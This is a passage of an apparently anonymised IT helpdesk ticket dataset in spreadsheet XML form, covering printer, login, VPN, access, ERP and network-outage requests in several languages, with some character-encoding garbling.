    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="printer co16 is not printing."/>
    <s v="printer co16 is not printing._x000a_server : \\HostName_813_x000a_error : update driver._x000a_contact : 812"/>
    <s v="wgmtckef atgmfybs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="vxzahrlc frtkpehy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="query from qdapolnv jlcavxgi"/>
    <s v="query from qdapolnv jlcavxgi"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lentidÃ£o da mÃ¡quina"/>
    <s v="favor verificar a lentidÃ£o da minha mÃ¡quina, estÃ¡ fora do normal, mesmo sendo final de mÃªs."/>
    <s v="frjpkuwq rtznexbq"/>
    <x v="62"/>
  </r>
  <r>
    <s v="basis on-call / shift details..."/>
    <s v="_x000d__x000a__x000d__x000a_received from: mnxbeuso.rfmdlwuo@gmail.com_x000d__x000a__x000d__x000a_team â€“_x000d__x000a__x000d__x000a_please find basis weekend/weekday(night) on-call schedule and shift schedule as per attachment. this excel is in the below location in the collaboration_platform. you can save the below link so that you can use this link to find on-call/shift persons and will keep updating the excel with the details as and when required._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="mnxbeuso rfmdlwuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please provide full access to \\HostName_768\rtr\kcompany"/>
    <s v="please provide full access to \\HostName_768\rtr\kcompany"/>
    <s v="ntsowaem jfgslyde"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="srmuqpna wtlvbxmc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password locked"/>
    <s v="_x000a__x000a_received from: ebkfwhgt.flapokym@gmail.com_x000a__x000a_hello,_x000a_s.venkbghksh â€“i no-200535 ,login id :sv1 is locked.pl arrange to unlock the same immediately._x000a__x000a_pghjkanijkraj.s.s_x000a__x000a__x000a_"/>
    <s v="ebkfwhgt flapokym"/>
    <x v="0"/>
  </r>
  <r>
    <s v="browser issue "/>
    <s v="i cannot access company collaboration_platform to sign into hr_tool"/>
    <s v="nibaotpy vmxathog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not start netweaver"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wsimcqzt.xvwzbdhq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_during to start netweaver, system require net framdntywork 4.5._x000d__x000a_could you please add that on my pc._x000d__x000a__x000d__x000a_[cid:image001.png@01d2038f.0a3ad480]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grugermany / with best "/>
    <s v="wsimcqzt xvwzbdhq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation "/>
    <s v="mobile device activation "/>
    <s v="uvwphrbl hfqdumtv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="istallation of programdntymes into the new cpu"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yxliakph.soucfnqe@gmail.com_x000d__x000a__x000d__x000a_we've raised a afe for a new spindle uacyltoe hxgayczerig, wherein this cpu &amp; monitors are to be installed, we are sending the same to you for necessary installation of programdntymes like windows 9 operating system._x000d__x000a_request you to do the same by tomorrow._x000d__x000a_best  "/>
    <s v="yxliakph soucfnqe"/>
    <x v="18"/>
  </r>
  <r>
    <s v="xjmpacye qgxrptnf cannot send delivery notes via zz_mails"/>
    <s v="dear it team, _x000d__x000a_my colleague cannot send herself pdfÂ´s out of erp via zz_mails. _x000d__x000a_the problem already exists since some days. _x000d__x000a_she already looged off an on from erp and windows, but it stil does not work. _x000d__x000a_can you please have a look?_x000d__x000a_"/>
    <s v="xjmpacye qgxrptnf"/>
    <x v="12"/>
  </r>
  <r>
    <s v="printer problem / issue information"/>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ex hq50 â€“ wy98 - hp 8150)       hr 17     plus  hr 14_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?  i am receiving an error message window box that states:   install driver.  when i click to install, it appears that it is working, however, i then get another message that states:  the document could not be printed_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc)   all _x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)   _x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?_x000d__x000a__x000d__x000a_   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm)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gljrdmnu yfnbkcmp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="multiple shop floor employees getting locked out of mii in usa ohio"/>
    <s v="please help unlock the accounts of the following employees_x000a_they are currently unable to log into mii and record production / value add_x000a__x000a_1) keghn zanegtyla : clock# 6654525_x000a_2) pfxwuvce hcbmiqdp : clock# 6656800_x000a__x000a_"/>
    <s v="epivntxc fdrxmuga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to my drive (please check her account)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ybhazlqp.zfghsxiw@gmail.com_x000d__x000a__x000d__x000a_hallo it team,_x000d__x000a__x000d__x000a_wie verbinde ich mich zu meinen netzlaufwerk, â€žapptc&quot;?_x000d__x000a_der zugang ist seit gestern weg._x000d__x000a__x000d__x000a_danke und gruÃŸ,_x000d__x000a_ybhazlqp zfghsxiw_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d2038b.SID_41fdaf0]_x000d__x000a__x000d__x000a_"/>
    <s v="ybhazlqp zfghsxiw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="additional corrections of  sales org 1278 and company address/phone numbers required after germany move"/>
    <s v="1. sales organisation address 1278 â€“ phone number and fax number need to be reversed to original phone/fax number from fÃ¼rth.  0911â€¦_x000d__x000a_2. plant address plant_124 â€“ phone /fax numbers need to be adjusted to show germany central phone numbers/fax_x000d__x000a_3. company code address of 5278 need to be reverted back! address is in fÃ¼rth not in germany_x000d__x000a__x000d__x000a_details are attached to the ticket."/>
    <s v="mynfoicj riuvxdas"/>
    <x v="12"/>
  </r>
  <r>
    <s v="setup outlook  \ wareneingang \vzqomdgt jwoqbuml"/>
    <s v="setup outlook  \ wareneingang \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="outlook not accepting password : outlook 2010"/>
    <s v="outlook not accepting password : outlook 2010"/>
    <s v="szhljtcx rtmxlegk"/>
    <x v="0"/>
  </r>
  <r>
    <s v=".rar file query"/>
    <s v=".rar file query"/>
    <s v="ilypdtno mkdfetuq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad password reset "/>
    <s v="ad password reset "/>
    <s v="kyzhcsrq fwyltvpd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp problem! - SID_34 - unable to delete customer from personal value list"/>
    <s v="user &quot;ripfghscp&quot; has accidently added one customer to her personal value list. _x000a__x000a_now the customer shows up in every sales document as &quot;default&quot; not allowing to search for different customers._x000a__x000a_please check and provide a short tutorial how to solve this problem. _x000a__x000a_daily work is heavily influenced!_x000a__x000a_"/>
    <s v="gkxsnaty ibeawmjt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage:barcelona - tesscenter 1:site is hard down since at 5:44 am et on 08/31.no backup on site."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____5:44 am et on 08/31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na_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __na______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___email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edit user is not working "/>
    <s v="edit user hangs forever in the user admin management screen and unable to submit the user assignments."/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="21"/>
  </r>
  <r>
    <s v="reset passwords for bxeagsmt zrwdgsco using password_management_tool password reset."/>
    <s v="the"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="16"/>
  </r>
  <r>
    <s v="access required"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hjkyqecw.ixdsbwoz@gmail.com_x000d__x000a__x000d__x000a_pl provided access to folder with all rights   \\HostName_95\mtdesign\company machine manuals&lt;file:///\\HostName_95\mtdesign\company%20machine%20manuals&gt;._x000d__x000a__x000d__x000a_with best "/>
    <s v="hjkyqecw ixdsbwoz"/>
    <x v="11"/>
  </r>
  <r>
    <s v="my sysetem remote access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: utgszjrf.pacfvxzk@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_my system is cant able remote access so me look into that .awyw8328084_x000d__x000a__x000d__x000a_with "/>
    <s v="utgszjrf pacfvxzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request for solid works viewer in wrench_engineering_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xnzfsmue.kwsazpeu@gmail.com_x000d__x000a__x000d__x000a_kindly provide the solid work viewer in wrench_engineering_tool to my computer,_x000d__x000a_comp name:awyw8911785_x000d__x000a__x000d__x000a_"/>
    <s v="xnzfsmue kwsazpeu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="call from third party to talk to it head to present themselves"/>
    <s v="call from third party to talk to it head to present themselves"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows user id"/>
    <s v="_x000a__x000a_received from: ilbkhgxd.hirsqytd@gmail.com_x000a__x000a_help desk_x000a__x000a_please provide the windows user id to below user._x000a__x000a_user id : gb3ytu_x000a_name : g bfghabu_x000a__x000a_"/>
    <s v="ilbkhgxd hirsqytd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi is not working "/>
    <s v="wifi is not working "/>
    <s v="navfgybz fuavxjzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="upiyobvj lwohuizr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not access to skpye for business"/>
    <s v="contact phone:497 or 18621, can not access to skpye for business, user name or password wrong"/>
    <s v="hygiajzb ajvmhbsr"/>
    <x v="18"/>
  </r>
  <r>
    <s v="reaktivieren alte laptop hr. mghllenbecfnfk \bctypmjw cbhnxafz"/>
    <s v="reaktivieren alte laptop hr. mghllenbecfnfk \bctypmjw cbhnxafz"/>
    <s v="bctypmjw cbhnxafz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_728 failed in job_scheduler at: 08/31/2016 03:44:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_728 failed in job_scheduler at: 08/31/2016 03:44:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="issue with hr_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ntuhoafg.bzwefjvk@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please look in to the below screenshot and help to resolve the issue._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d20389.31ea5790]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="52"/>
  </r>
  <r>
    <s v="reinstall office2010 \ bctypmjw cbhnxafz"/>
    <s v="reinstall office2010 \ bctypmjw cbhnxafz"/>
    <s v="bctypmjw cbhnxafz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit EU_tool \we_wu106 \xaqzisrk ahbgjrqz"/>
    <s v="probleme mit EU_tool \we_wu106 \xaqzisrk ahbgjrqz"/>
    <s v="xaqzisrk ahbgjrqz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="please switch of tr telephony_software today from 09:30 to 09:45 cet"/>
    <s v="this is last call meeting that was set up by fhtyulvio and all of them have to participate._x000a_ _x000a_if you are not able to do it, and maybe it is even easier, then please remove any abandon that may take place during these 15 mins_x000a_"/>
    <s v="djpwfxzt cfkwxlmq"/>
    <x v="6"/>
  </r>
  <r>
    <s v="last login on company laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: htnvbwxs.gwfrzuex@gmail.com_x000d__x000a__x000d__x000a_good day._x000d__x000a__x000d__x000a_please assist:_x000d__x000a__x000d__x000a_please can you check when/who was the last login was on company laptop ekpl8111112?_x000d__x000a__x000d__x000a_"/>
    <s v="htnvbwxs gwfrzuex"/>
    <x v="65"/>
  </r>
  <r>
    <s v="engineering tool not opening"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vsiemxgh.lgeciroy@gmail.com_x000d__x000a__x000d__x000a_dear sir/mam,_x000d__x000a__x000d__x000a_kindly refer the below screenshot. my engineering tool is not opening and showing the below error._x000d__x000a_request you to resolve the issue immediately._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d20383.bbe2d590]_x000d__x000a__x000d__x000a_best "/>
    <s v="vsiemxgh lgeciroy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="missrouting of printouts:  check settings if printing invoiuce to printer ag28 / fÃ¼rth and change printer to jc00 / "/>
    <s v="_x000d__x000a__x000d__x000a_received from: tkuivxrn.urdgitsv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_settings in erp SID_34 system of printing inwarehouse_tool e.g. 0158047476 are wrong (plant_168 to plant_113 shipments)._x000d__x000a__x000d__x000a_please change setting to printer jc00, due to no requirement to continue printing  these paper in fÃ¼rth = protect the planet._x000d__x000a__x000d__x000a_many "/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="12"/>
  </r>
  <r>
    <s v="please change password and pin for the EU_tool"/>
    <s v="please change password and pin for the EU_tool"/>
    <s v="lgtdheno wfukbdjy"/>
    <x v="58"/>
  </r>
  <r>
    <s v="stock issue for mm 1021381"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgtoger.lfgtiu@company.com_x000d__x000a__x000d__x000a_hello it_x000d__x000a__x000d__x000a_please help check the issue below, there are 90pcs stock under plant_283, but in code: zme2o, there is 0 stock, so can't run the dn. "/>
    <s v="bejcxvis anxmhwis"/>
    <x v="29"/>
  </r>
  <r>
    <s v="vpn link "/>
    <s v="_x000d__x000a__x000d__x000a_received from: neoarmgd.meodvbxu@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_i am not able to log on to above network with me windows login credentials._x000d__x000a__x000d__x000a__x000d__x000a_please check and resolve, as my work is getting hampered._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="neoarmgd meodvbxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ooo : !3.09.2016issues with mailbox &quot; company&quot;"/>
    <s v="_x000a__x000a_received from: fbyusmxz.kxvmcbly@gmail.com_x000a__x000a_hello,_x000a__x000a_i am owner of the common mailbox &quot; company&quot;_x000a_i have created a new folder &quot;xxxxx&quot; under the folder inbox for uacyltoe hxgayczeing._x000a_[cid:image001.png@01d2035c.6d1b0e90]_x000a__x000a_all other members of this shared mailbox can not see the folder &quot;xxxxx&quot; and i can not delete it anymore._x000a_i can click on &quot;delete folder&quot; and get no error message, but the folder is still thereâ€¦_x000a__x000a_also other members have created folders under the folder inbox â€“ e.g. soedjitv wvprteja (scherfgpd) has created the folder &quot;uacyltoe hxgaycze2&quot;._x000a_the folder &quot;uacyltoe hxgaycze2&quot; is only visible for her._x000a_also for me â€“ as the owner â€“ the folder is not visible._x000a_something is wrong with this mailbox._x000a_could you please check._x000a_"/>
    <s v="fbyusmxz kxvmcbly"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vfx3 - 1417 - foreign trade data missing"/>
    <s v="dear it team,_x000d__x000a__x000d__x000a_i checked this morning vfx3, unfortunately, there are still 4 entries, where i do not know what to do._x000d__x000a_can you please check?_x000d__x000a_inwarehouse_tool 0158898835: pricing error_x000d__x000a_inwarehouse_tools 0158947538, 0158027980 and 0158027991: i completed the foreign trade data, but the error is still coming. _x000d__x000a__x000d__x000a_as we have months end, we need to fix this today._x000d__x000a__x000d__x000a_"/>
    <s v="fmqubnvs kcxpeyiv"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ç”µè„‘è¿è¡Œé€Ÿåº¦è¶…çº§æ…¢ï¼Œæ‰“å¼€ä¸€ä¸ªerpæ–°çš„ç•Œé¢å’Œæ‰“å¼€officeæ–‡ä»¶éƒ½éœ€è¦5ç§’é’Ÿä»¥ä¸Šã€‚è½¬è´ºæ­£å¹³"/>
    <s v="_x000a__x000a_received from: tuqrvowp.fxmzkvqo@gmail.com_x000a__x000a_hello team,_x000a__x000a_ç”µè„‘è¿è¡Œé€Ÿåº¦è¶…çº§æ…¢ï¼Œæ‰“å¼€ä¸€ä¸ªerpæ–°çš„ç•Œé¢å’Œæ‰“å¼€officeæ–‡ä»¶éƒ½éœ€è¦5ç§’é’Ÿä»¥ä¸Šã€‚è½¬è´ºæ­£å¹³_x000a__x000a__x000a__x000a_tuqrvowp fxmzkvqo é’±å”é‘«_x000a_human resources_x000a_tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;_x000a_"/>
    <s v="tuqrvowp fxmzkvqo"/>
    <x v="30"/>
  </r>
  <r>
    <s v="wifi disconnecting"/>
    <s v="_x000d__x000a__x000d__x000a_received from: puxiomgy.ndjorwab@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am puxiomgy ndjorwab from india branch._x000d__x000a_i am facing issue of wi-fi network disconnecting every 5-10 mins when seated at 2nd floor admin building._x000d__x000a_request you to arrange to resolve at the earliest._x000d__x000a__x000d__x000a_"/>
    <s v="puxiomgy ndjorwab"/>
    <x v="18"/>
  </r>
  <r>
    <s v="circuit outage:usa nc vpn circuit is down at 12:32 am et on 08/31. site is up on primary circuit."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________12:32 am et on 08/31______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no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_yes___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na__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mii password reset &amp; unlock account"/>
    <s v="mii password reset &amp; unlock account"/>
    <s v="vlnjxdyk usgyfoit"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to erp "/>
    <s v="unable to login to erp"/>
    <s v="giumxwvh lfvwjtin"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please process the billing accounting (0372101858) in erp. "/>
    <s v="please process the billing accounting (0372101858) in erp. "/>
    <s v="hlrmufzx qcdzierm"/>
    <x v="9"/>
  </r>
  <r>
    <s v="data card"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dwujlnhs.ecxvrpyl@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a__x000d__x000a_i have received new system, but there is no data card along with that._x000d__x000a_kindly arrange to send me data card._x000d__x000a__x000d__x000a_best "/>
    <s v="dwujlnhs ecxvrpyl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="engineering tool issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dwujlnhs.ecxvrpyl@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a__x000d__x000a_i had received new system last week. there was no engineering tool, i downloaded engineering tool but unable to see my old uploaded reports kindly resolve._x000d__x000a__x000d__x000a_best "/>
    <s v="dwujlnhs ecxvrpyl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="assignment field for edi posting"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ihfkwzjd.erbxoyqk@gmail.com_x000d__x000a__x000d__x000a_dear it team_x000d__x000a__x000d__x000a_i found that dn number has not been shown on assignment field for edi posting transaction as below. what is the changes or error on this? please confirm_x000d__x000a_we need to use dn number to do intercompany reconciliation on the month end process._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d2037a.adf650a0]_x000d__x000a__x000d__x000a_[cid:image002.jpg@01d2037a.adf650a0]_x000d__x000a__x000d__x000a_best "/>
    <s v="ihfkwzjd erbxoyqk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="kindly replace the mouse as it is not working "/>
    <s v="kindly replace the mouse as it is not working "/>
    <s v="xagyhbio jvrdnpkh"/>
    <x v="18"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="giumxwvh lfvwjtin"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_toolä¸Šä¼ ä¸äº†"/>
    <s v="æŠ¥è­¦æ˜¾ç¤ºæ²¡æœ‰å»ºç«‹ç½‘ç»œè¿žæŽ¥ï¼Œä½†æ˜¯vpnå·²ç»è¿žæŽ¥ã€‚_x000d__x000a_ä¿®æ”¹å®Œå¯†ç ä¹‹åŽå°±ä¸Šä¼ ä¸äº† äº†"/>
    <s v="molihtdq auprogsj"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="omgqwuae utbrfyzq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="SID_1 erp uacyltoe hxgaycze - login issue &amp; password reset."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ilbkhgxd.hirsqytd@gmail.com_x000d__x000a__x000d__x000a_help desk_x000d__x000a__x000d__x000a_following issue is faced when i was trying to login in SID_1 erp uacyltoe hxgaycze.  please go through below screen shot &amp; do the needful._x000d__x000a__x000d__x000a_[cid:image004.png@01d20366.2d0ed520][cid:image005.png@01d20366.2d0ed520][cid:image003.png@01d20365.ffbcf700]_x000d__x000a__x000d__x000a_since i used this system long back i would like to request you to do password reset. please do the needful at the earliest._x000d__x000a__x000d__x000a_"/>
    <s v="ilbkhgxd hirsqytd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset "/>
    <s v="windows password reset "/>
    <s v="yrzvhbic rechmoiy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="wmsaxylo tyqgpkxz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abend batch job  Job_3028 failed in job_scheduler at: 08/30/2016 22:02:23 "/>
    <s v="job name:Job_3028 failed in job_scheduler"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="44"/>
  </r>
  <r>
    <s v=" mii password reset &amp; unlock account"/>
    <s v=" mii password reset &amp; unlock account"/>
    <s v="qgwypesz fzsdnmrk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_549 failed in job_scheduler at: 08/30/2016 22:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_549 failed in job_scheduler at: 08/30/2016 22:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_50filesys failed in job_scheduler at: 08/30/2016 22:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_50filesys failed in job_scheduler at: 08/30/2016 22:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="when i create a recurring appointment in mds i get an error record is unavailable"/>
    <s v="when i create a recurring appointment in mds i get an error record is unavailable. this occurred in uacyltoe hxgaycze. see attachment_x000d__x000a_"/>
    <s v="acteiqdu bferalus"/>
    <x v="39"/>
  </r>
  <r>
    <s v="i paid to vendor (2111101830) in aug.29.2016,  but i don't  clear this vendor in t-code (f-53)."/>
    <s v="i paid to vendor (2111101830) in aug.29.2016,  but i don't  clear this vendor in t-code (f-53). erp show: no open items were found,but it has item in t-code (fbl1n) ."/>
    <s v="hlrmufzx qcdzierm"/>
    <x v="9"/>
  </r>
  <r>
    <s v="my outlook and skype does not work when i am at home. it only works in the office."/>
    <s v="name:callie pollaurid_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xzupryaf.vlbikhsm@gmail.com_x000a_customer number:_x000a_telephone:724_x000a_summary:my outlook and skype does not work when i am at home. it only works in the office."/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype ä¸èƒ½ç™»å½•ï¼Œæç¤ºè¯ä¹¦é”™è¯¯ã€‚"/>
    <s v="skype ä¸èƒ½ç™»å½•ï¼Œæç¤ºè¯ä¹¦é”™è¯¯ã€‚"/>
    <s v="qekyowtv qdjixvkh"/>
    <x v="31"/>
  </r>
  <r>
    <s v="system not responding"/>
    <s v="system not responding"/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="it assistance"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oydlehun.svnfrxdk@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i'm putting up this it ticket on behalf of nzuofeam exszgtwd whose notebook cannot boot up due to hardware failure._x000d__x000a__x000d__x000a_please assist immediately. "/>
    <s v="oydlehun svnfrxdk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="multiple display not working"/>
    <s v="multiple display not working"/>
    <s v="ijmabvlz vosuedkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp account unlock"/>
    <s v="erp account unlock"/>
    <s v="ncuwyeib plnzhxvc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tablet not booting"/>
    <s v="tablet not booting"/>
    <s v="mfkibqgu rdvfzeba"/>
    <x v="0"/>
  </r>
  <r>
    <s v="log in permissions not working.  need to change password also.  please call me"/>
    <s v="name:etlfrucw ziewxqof_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:etlfrucw.ziewxqof@gmail.com_x000a_customer number:_x000a_telephone:519_x000a_summary:log in permissions not working.  need to change password also.  please call me_x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_rakthyesh ramdntythanjesh_x000a_ hi dartvis_x000a_ "/>
    <s v="etlfrucw ziewxqof"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ä¸»æœºä¸èƒ½å¼€å¯"/>
    <s v="ä¸»æœºä¸èƒ½å¼€å¯ï¼Œç”µæºç¯æ­£å¸¸ï¼Œä¸»æœºé¢æ¿1ã€3æŒ‡ç¤ºç¯å¸¸äº®"/>
    <s v="cpdilmjx jwsqpiac"/>
    <x v="47"/>
  </r>
  <r>
    <s v="æ‰“å¼€office 2013æ˜¾ç¤ºæ˜¯æœªç»æŽˆæƒäº§å“"/>
    <s v="æ‰“å¼€outlookã€pptæ˜¾ç¤ºæ˜¯æœªç»æŽˆæƒäº§å“,æœ›è§£å†³ã€‚"/>
    <s v="hbvwqine eakqyovu"/>
    <x v="47"/>
  </r>
  <r>
    <s v="network outage: russia - warehouse network is down since 6:30pm et on 08/30/2016"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________6:30pm et on 08/30/20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no___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____na____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na_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circuit outage at milan, it- divestiture since 8pm et 08/30. site is on primary."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___8pm et 08/30___________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____no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x v="7"/>
  </r>
  <r>
    <s v="login to mii issue."/>
    <s v="login to mii issue."/>
    <s v="xdcpmtfn xzvbjhlc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email &amp; calendar on my phone"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tjlizqgc.ngvwoukp@gmail.com_x000d__x000a__x000d__x000a_i just received a replacement of my company supplied phone. i have set it up but need for it to be given access to my email, contacts and calendar.  if this is not the right place to make this request please let me know.  "/>
    <s v="tjlizqgc ngvwoukp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="expense report"/>
    <s v="_x000a__x000a_received from: ytqhfmwi.itnakpmc@gmail.com_x000a__x000a_my expense report will not submit to my manager, it only saves. please submit. this has happened on all my expense reports._x000a__x000a_[cid:image001.jpg@01d202d8.cf36c3f0]_x000a__x000a__x000a_michjnfyele l. jenhntyns_x000a_plant manager_x000a_ytqhfmwi.itnakpmc@gmail.com&lt;mailto:ytqhfmwi.itnakpmc@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="ytqhfmwi itnakpmc"/>
    <x v="68"/>
  </r>
  <r>
    <s v="folder access for jywvemun qngschtz"/>
